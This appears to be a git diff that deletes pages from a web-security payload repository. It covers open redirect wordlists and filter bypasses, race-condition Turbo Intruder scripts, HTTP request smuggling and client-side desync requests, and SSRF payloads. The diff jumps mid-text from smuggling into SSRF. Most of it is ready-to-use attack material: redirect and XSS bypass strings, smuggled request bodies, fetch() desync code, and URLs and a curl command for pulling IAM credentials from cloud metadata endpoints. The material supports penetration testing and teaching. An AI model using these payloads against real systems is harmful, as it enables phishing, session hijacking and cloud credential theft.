-http:XY>.7d8T\205pZM@0xd8.3856078 -http:00330.3856078 -http:www.whitelisteddomain.tld@00330.3856078 -http:3H6k7lIAiqjfNeN@00330.3856078 -http:XY>.7d8T\205pZM@00330.3856078 -http:00330.0x3a.54990 -http:www.whitelisteddomain.tld@00330.0x3a.54990 -http:3H6k7lIAiqjfNeN@00330.0x3a.54990 -http:XY>.7d8T\205pZM@00330.0x3a.54990 -〱google.com -〵google.com -ゝgoogle.com -ーgoogle.com -ーgoogle.com -/〱google.com -/〵google.com -/ゝgoogle.com -/ーgoogle.com -/ーgoogle.com -%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d -http://%67%6f%6f%67%6c%65%2e%63%6f%6d -<>javascript:alert(1); -<>//google.com -//google.com\@www.whitelisteddomain.tld -https://:@google.com\@www.whitelisteddomain.tld -\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) -\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) -ja\nva\tscript\r:alert(1) -\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) -\152\141\166\141\163\143\162\151\160\164\072alert(1) -http://google.com:80#@www.whitelisteddomain.tld/ -http://google.com:80?@www.whitelisteddomain.tld/ -http://google.com\www.whitelisteddomain.tld -http://google.com&www.whitelisteddomain.tld -http:///////////google.com -\\google.com -http://www.whitelisteddomain.tld.google.com diff --git a/Open Redirect/Intruder/open_redirect_wordlist.txt b/Open Redirect/Intruder/open_redirect_wordlist.txt deleted file mode 100644 index 10b9595..0000000 --- a/Open Redirect/Intruder/open_redirect_wordlist.txt +++ /dev/null @@ -1,18 +0,0 @@ -/http://example.com -/%5cexample.com -/%2f%2fexample.com -/example.com/%2f%2e%2e -/http:/example.com -/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com -/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com -/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com -/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com -/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com -/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com -/.example.com -///\;@example.com -///example.com/ -///example.com -///example.com/%2f.. -/////example.com/ -/////example.com \ No newline at end of file diff --git a/Open Redirect/Intruder/openredirects.txt b/Open Redirect/Intruder/openredirects.txt deleted file mode 100644 index c85c636..0000000 --- a/Open Redirect/Intruder/openredirects.txt +++ /dev/null @@ -1,67 +0,0 @@ -/%09/example.com -/%2f%2fexample.com -/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ -/%5cexample.com -/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d -/.example.com -//%09/example.com -//%5cexample.com -///%09/example.com -///%5cexample.com -////%09/example.com -////%5cexample.com -/////example.com -/////example.com/ -////\;@example.com -////example.com/ -////example.com/%2e%2e -////example.com/%2e%2e%2f -////example.com/%2f%2e%2e -////example.com/%2f.. -////example.com// -///\;@example.com -///example.com -///example.com/ -///example.com/%2e%2e -///example.com/%2e%2e%2f -///example.com/%2f%2e%2e -///example.com/%2f.. -///example.com// -//example.com -//example.com/ -//example.com/%2e%2e -//example.com/%2e%2e%2f -//example.com/%2f%2e%2e -//example.com/%2f.. -//example.com// -//google%00.com -//google%E3%80%82com -//https:///example.com/%2e%2e -//https://example.com/%2e%2e%2f -//https://example.com// -/<>//example.com -/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com -/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com -/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com -/\/\/example.com/ -/\/example.com/ -/example.com/%2f%2e%2e -/http://%67%6f%6f%67%6c%65%2e%63%6f%6d -/http://example.com -/http:/example.com -/https:/%5cexample.com/ -/https://%09/example.com -/https://%5cexample.com -/https:///example.com/%2e%2e -/https:///example.com/%2f%2e%2e -/https://example.com -/https://example.com/ -/https://example.com/%2e%2e -/https://example.com/%2e%2e%2f -/https://example.com/%2f%2e%2e -/https://example.com/%2f.. -/https://example.com// -/https:example.com -/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com -/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com -/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com diff --git a/Open Redirect/README.md b/Open Redirect/README.md deleted file mode 100644 index faf4d4f..0000000 --- a/Open Redirect/README.md +++ /dev/null @@ -1,194 +0,0 @@ -# Open URL Redirection - -> Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. - -## Summary - -- [Open URL Redirection](#open-url-redirection) - - [Summary](#summary) - - [Exploitation](#exploitation) - - [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx) - - [Fuzzing](#fuzzing) - - [Filter Bypass](#filter-bypass) - - [Common injection parameters](#common-injection-parameters) - - [References](#references) - -## Exploitation - -Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like : - -```powershell -https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account -``` -After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL. -What happens if we change the `famous-website.tld/account` to `evil-website.tld`? - -```powershell -https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account -``` - -By visiting this url, if we get redirected to `evil-website.tld` after the sign-up, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials. - - -## HTTP Redirection Status Code - 3xx - -- [300 Multiple Choices](https://httpstatuses.com/300) -- [301 Moved Permanently](https://httpstatuses.com/301) -- [302 Found](https://httpstatuses.com/302) -- [303 See Other](https://httpstatuses.com/303) -- [304 Not Modified](https://httpstatuses.com/304) -- [305 Use Proxy](https://httpstatuses.com/305) -- [307 Temporary Redirect](https://httpstatuses.com/307) -- [308 Permanent Redirect](https://httpstatuses.com/308) - -## Fuzzing - -Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case - -To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL. - -```powershell -WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt -``` - -## Filter Bypass - -Using a whitelisted domain or keyword - -```powershell -www.whitelisted.com.evil.com redirect to evil.com -``` - -Using CRLF to bypass "javascript" blacklisted keyword - -```powershell -java%0d%0ascript%0d%0a:alert(0) -``` - -Using "//" & "////" to bypass "http" blacklisted keyword - -```powershell -//google.com -////google.com -``` - -Using "https:" to bypass "//" blacklisted keyword - -```powershell -https:google.com -``` - -Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) - -```powershell -\/\/google.com/ -/\/google.com/ -``` - -Using "%E3%80%82" to bypass "." blacklisted character - -```powershell -/?redir=google。com -//google%E3%80%82com -``` - -Using null byte "%00" to bypass blacklist filter - -```powershell -//google%00.com -``` - -Using parameter pollution - -```powershell -?next=whitelisted.com&next=google.com -``` - -Using "@" character, browser will redirect to anything after the "@" - -```powershell -http://www.theirsite.com@yoursite.com/ -``` - -Creating folder as their domain - -```powershell -http://www.yoursite.com/http://www.theirsite.com/ -http://www.yoursite.com/folder/www.folder.com -``` - -Using "?" characted, browser will translate it to "/?" - -```powershell -http://www.yoursite.com?http://www.theirsite.com/ -http://www.yoursite.com?folder/www.folder.com -``` - - -Host/Split Unicode Normalization -```powershell -https://evil.c℀.example.com . ---> https://evil.ca/c.example.com -http://a.com/X.b.com -``` - -XSS from Open URL - If it's in a JS variable - -```powershell -";alert(0);// -``` - -XSS from data:// wrapper - -```powershell -http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== -``` - -XSS from javascript:// wrapper - -```powershell -http://www.example.com/redirect.php?url=javascript:prompt(1) -``` - -## Common injection parameters - -```powershell -/{payload} -?next={payload} -?url={payload} -?target={payload} -?rurl={payload} -?dest={payload} -?destination={payload} -?redir={payload} -?redirect_uri={payload} -?redirect_url={payload} -?redirect={payload} -/redirect/{payload} -/cgi-bin/redirect.cgi?{payload} -/out/{payload} -/out?{payload} -?view={payload} -/login?to={payload} -?image_url={payload} -?go={payload} -?return={payload} -?returnTo={payload} -?return_to={payload} -?checkout_url={payload} -?continue={payload} -?return_path={payload} -``` -## Labs - -* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection) - - -## References - -* filedescriptor -* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781) -* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) -* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) -* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) -* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) -* [Host/Split Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf) diff --git a/README.md b/README.md deleted file mode 100644 index 84f452e..0000000 --- a/README.md +++ /dev/null @@ -1,75 +0,0 @@ -# Payloads All The Things - -A list of useful payloads and bypasses for Web Application Security. -Feel free to improve with your payloads and techniques ! -I :heart: pull requests :) - -You can also contribute with a :beers: IRL, or using the sponsor button - -[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) -[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) - -An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThings/). - -

- -

- - -📖 Documentation ------ -Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter: - -- README.md - vulnerability description and how to exploit it, including several payloads -- Intruder - a set of files to give to Burp Intruder -- Images - pictures for the README.md -- Files - some files referenced in the README.md - -You might also like the `Methodology and Resources` folder : - -- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) - - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md) - - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) - - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md) - - [Linux - Evasion.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md) - - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) - - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md) - - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) - - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - - [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md) - - [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) - - [Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) - - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md) - - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md) - - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md) - - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - - -You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections. - - -👨‍💻 Contributions ------ -Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CONTRIBUTING.md) - -

- - - -

- -Thanks again for your contribution! :heart: - - -🧙‍♂️ Sponsors ------ - -This project is proudly sponsored by these companies. - -[](https://www.vaadata.com/) -[](https://github.com/projectdiscovery) diff --git a/Race Condition/README.md b/Race Condition/README.md deleted file mode 100644 index f8fe48b..0000000 --- a/Race Condition/README.md +++ /dev/null @@ -1,83 +0,0 @@ -# Race Condition - -> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. - -## Summary - -- [Race Condition](#race-condition) - - [Summary](#summary) - - [Tools](#tools) - - [Turbo Intruder Examples](#turbo-intruder-examples) - - [Turbo Intruder 2 Requests Examples](#turbo-intruder-2-requests-examples) - - [References](#references) - -## Tools - -* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) - -## Turbo Intruder Examples - -1. Send request to turbo intruder -2. Use this python code as a payload of the turbo intruder - ```python - def queueRequests(target, wordlists): - engine = RequestEngine(endpoint=target.endpoint, - concurrentConnections=30, - requestsPerConnection=30, - pipeline=False - ) - - for i in range(30): - engine.queue(target.req, i) - engine.queue(target.req, target.baseInput, gate='race1') - - - engine.start(timeout=5) - engine.openGate('race1') - - engine.complete(timeout=60) - - - def handleResponse(req, interesting): - table.add(req) - ``` -3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder -4. Click "Attack" - -## Turbo Intruder 2 Requests Examples -This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. -```python -def queueRequests(target, wordlists): - engine = RequestEngine(endpoint=target.endpoint, - concurrentConnections=30, - requestsPerConnection=100, - pipeline=False - ) - request1 = ''' -POST /target-URI-1 HTTP/1.1 -Host: -Cookie: session= - -parameterName=parameterValue - ''' - - request2 = ''' -GET /target-URI-2 HTTP/1.1 -Host: -Cookie: session= - ''' - - engine.queue(request1, gate='race1') - for i in range(30): - engine.queue(request2, gate='race1') - engine.openGate('race1') - engine.complete(timeout=60) -def handleResponse(req, interesting): - table.add(req) -``` - -## References - -* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) -* [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) -* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md deleted file mode 100644 index 425ab2b..0000000 --- a/Request Smuggling/README.md +++ /dev/null @@ -1,181 +0,0 @@ -# Request Smuggling - -> HTTP Request smuggling occurs when multiple "things" process a request, but differ on how they determine where the request starts/ends. This disagreement can be used to interfere with another user's request/response or to bypass security controls. It normally occurs due to prioritising different HTTP headers (Content-Length vs Transfer-Encoding), differences in handling malformed headers (eg whether to ignore headers with unexpected whitespace), due to downgrading requests from a newer protocol, or due to differences in when a partial request has timed out and should be discarded. - -## Summary - -* [Tools](#tools) -* [CL.TE vulnerabilities](#cl.te-vulnerabilities) -* [TE.CL vulnerabilities](#te.cl-vulnerabilities) -* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) -* [References](#references) - -## Tools - -* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) -* [Smuggler](https://github.com/defparam/smuggler) -* [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) > this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually! - - -## About CL.TE | TE.CL Vulnerabilities -If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as portswigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`. For that reason you can use the [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) and exploit the CL.TE TE.CL vulnerabilities manually and learn how this vulnerability works and how you can exploit it. This tool offers you only the second request with a valid chunk size(TE.CL) auto-generated but does not offer automated exploitation. You have to identify the injection point and exploit it manually! - - - - - -## CL.TE vulnerabilities - -> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. - -```powershell -POST / HTTP/1.1 -Host: vulnerable-website.com -Content-Length: 13 -Transfer-Encoding: chunked - -0 - -SMUGGLED -``` - -Example: - -```powershell -POST / HTTP/1.1 -Host: domain.example.com -Connection: keep-alive -Content-Type: application/x-www-form-urlencoded -Content-Length: 6 -Transfer-Encoding: chunked - -0 - -G -``` - -Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te - -## TE.CL vulnerabilities - -> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. - -```powershell -POST / HTTP/1.1 -Host: vulnerable-website.com -Content-Length: 3 -Transfer-Encoding: chunked - -8 -SMUGGLED -0 -``` - -Example: - -```powershell -POST / HTTP/1.1 -Host: domain.example.com -User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 -Content-Length: 4 -Connection: close -Content-Type: application/x-www-form-urlencoded -Accept-Encoding: gzip, deflate - -5c -GPOST / HTTP/1.1 -Content-Type: application/x-www-form-urlencoded -Content-Length: 15 -x=1 -0 - - -``` - -:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0. - -Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl - -## TE.TE behavior: obfuscating the TE header - -> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way. - -```powershell -Transfer-Encoding: xchunked -Transfer-Encoding : chunked -Transfer-Encoding: chunked -Transfer-Encoding: x -Transfer-Encoding:[tab]chunked -[space]Transfer-Encoding: chunked -X: X[\n]Transfer-Encoding: chunked -Transfer-Encoding -: chunked -``` - -Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header - -## HTTP/2 Request Smuggling - -HTTP/2 request smuggling can occur if a machine converts your HTTP/2 request to HTTP/1.1, and you can smuggle an invalid content-length header, transfer-encoding header or new lines (CRLF) into the translated request. HTTP/2 request smuggling can also occur in a GET request, if you can hide an HTTP/1.1 request inside an HTTP/2 header - -``` -:method GET -:path / -:authority www.example.com -header ignored\r\n\r\nGET / HTTP/1.1\r\nHost: www.example.com -``` - -Challenge: https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling - -## Client-side desync - -On some paths, servers don't expect POST requests, and will treat them as simple GET requests, ignoring the payload, eg: - -``` -POST / HTTP/1.1 -Host: www.example.com -Content-Length: 37 - -GET / HTTP/1.1 -Host: www.example.com -``` - -could be treated as two requests when it should only be one. When the backend server responds twice, the frontend server will assume only the first response is related to this request. - -To exploit this, an attacker can use JavaScript to trigger their victim to send a POST to the vulnerable site: - -```javascript -fetch('https://www.example.com/', {method: 'POST', body: "GET / HTTP/1.1\r\nHost: www.example.com", mode: 'no-cors', credentials: 'include'} ) -``` - -This could be used to: - -* get the vulnerable site to store a victim's credentials somewhere the attacker can access it -* get the victim to send an exploit to a site (eg for internal sites the attacker cannot access, or to make it harder to attribute the attack) -* to get the victim to run arbitrary JavaScript as if it were from the site - -Eg: -```javascript -fetch('https://www.example.com/redirect', { - method: 'POST', - body: `HEAD /404/ HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /x?x= HTTP/1.1\r\nX: Y`, - credentials: 'include', - mode: 'cors' // throw an error instead of following redirect -}).catch(() => { - location = 'https://www.example.com/' -}) -``` - -tells the victim browser to send a POST request to www.example.com/redirect. That returns a redirect which is blocked by CORS, and causes the browser to execute the catch block, by going to www.example.com. - -www.example.com now incorrectly processes the HEAD request in the POST's body, instead of the browser's GET request, and returns 404 not found with a content-length, before replying to the next misinterpreted third (`GET /x?x= -``` - -## Blind SSRF - -> When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. - -Use an SSRF chain to gain an Out-of-Band output. - -From https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ / https://github.com/assetnote/blind-ssrf-chains - -**Possible via HTTP(s)** -- [Elasticsearch](https://github.com/assetnote/blind-ssrf-chains#elasticsearch) -- [Weblogic](https://github.com/assetnote/blind-ssrf-chains#weblogic) -- [Hashicorp Consul](https://github.com/assetnote/blind-ssrf-chains#consul) -- [Shellshock](https://github.com/assetnote/blind-ssrf-chains#shellshock) -- [Apache Druid](https://github.com/assetnote/blind-ssrf-chains#druid) -- [Apache Solr](https://github.com/assetnote/blind-ssrf-chains#solr) -- [PeopleSoft](https://github.com/assetnote/blind-ssrf-chains#peoplesoft) -- [Apache Struts](https://github.com/assetnote/blind-ssrf-chains#struts) -- [JBoss](https://github.com/assetnote/blind-ssrf-chains#jboss) -- [Confluence](https://github.com/assetnote/blind-ssrf-chains#confluence) -- [Jira](https://github.com/assetnote/blind-ssrf-chains#jira) -- [Other Atlassian Products](https://github.com/assetnote/blind-ssrf-chains#atlassian-products) -- [OpenTSDB](https://github.com/assetnote/blind-ssrf-chains#opentsdb) -- [Jenkins](https://github.com/assetnote/blind-ssrf-chains#jenkins) -- [Hystrix Dashboard](https://github.com/assetnote/blind-ssrf-chains#hystrix) -- [W3 Total Cache](https://github.com/assetnote/blind-ssrf-chains#w3) -- [Docker](https://github.com/assetnote/blind-ssrf-chains#docker) -- [Gitlab Prometheus Redis Exporter](https://github.com/assetnote/blind-ssrf-chains#redisexporter) - -**Possible via Gopher** -- [Redis](https://github.com/assetnote/blind-ssrf-chains#redis) -- [Memcache](https://github.com/assetnote/blind-ssrf-chains#memcache) -- [Apache Tomcat](https://github.com/assetnote/blind-ssrf-chains#tomcat) - - -## SSRF to XSS - -by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) - -```bash -http://brutelogic.com.br/poc.svg -> simple alert -https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf - -https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg -``` - -## SSRF from XSS - -### Using an iframe - -The content of the file will be integrated inside the PDF as an image or text. - -```html - -``` - -### Using an attachment - -Example of a PDF attachment using HTML - -1. use `` as Bio text -2. use 'Download Data' feature to get PDF -3. use `pdfdetach -saveall filename.pdf` to extract embedded resource -4. `cat attachment.bin` - -## SSRF URL for Cloud Instances - -### SSRF URL for AWS Bucket - -[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) -Interesting path to look for at `http://169.254.169.254` or `http://instance-data` - -```powershell -Always here : /latest/meta-data/{hostname,public-ipv4,...} -User data (startup script for auto-scaling) : /latest/user-data -Temporary AWS credentials : /latest/meta-data/iam/security-credentials/ -``` - -DNS record - -```powershell -http://instance-data -http://169.254.169.254 -http://169.254.169.254.nip.io/ -``` - -HTTP redirect - -```powershell -Static:http://nicob.net/redir6a -Dynamic:http://nicob.net/redir-http-169.254.169.254:80- -``` - -Alternate IP encoding - -```powershell -http://425.510.425.510/ Dotted decimal with overflow -http://2852039166/ Dotless decimal -http://7147006462/ Dotless decimal with overflow -http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal -http://0xA9FEA9FE/ Dotless hexadecimal -http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow -http://0251.0376.0251.0376/ Dotted octal -http://0251.00376.000251.0000376/ Dotted octal with padding -http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) -``` - -More urls to include - -```powershell -http://169.254.169.254/latest/user-data -http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] -http://169.254.169.254/latest/meta-data/ -http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] -http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance -http://169.254.169.254/latest/meta-data/ami-id -http://169.254.169.254/latest/meta-data/reservation-id -http://169.254.169.254/latest/meta-data/hostname -http://169.254.169.254/latest/meta-data/public-keys/ -http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key -http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key -http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy -http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access -http://169.254.169.254/latest/dynamic/instance-identity/document -``` - -AWS SSRF Bypasses -``` -Converted Decimal IP: http://2852039166/latest/meta-data/ -IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ -IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/ -IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/ -``` - -E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` - -E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` - -### SSRF URL for AWS ECS - -If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID. - -```powershell -curl http://169.254.170.2/v2/credentials/ -``` - -This way you'll extract IAM keys of the attached role - -### SSRF URL for AWS Elastic Beanstalk - -We retrieve the `accountId` and `region` from the API. - -```powershell -http://169.254.169.254/latest/dynamic/instance-identity/document -http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role -``` - -We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API. - -```powershell -http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role -``` - -![notsosecureblog-awskey](https://www.notsosecure.com/wp-content/uploads/2019/02/aws-cli.jpg) - -Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. - - -### SSRF URL for AWS Lambda - -AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment. - -```powershell -http://localhost:9001/2018-06-01/runtime/invocation/next -$ curl 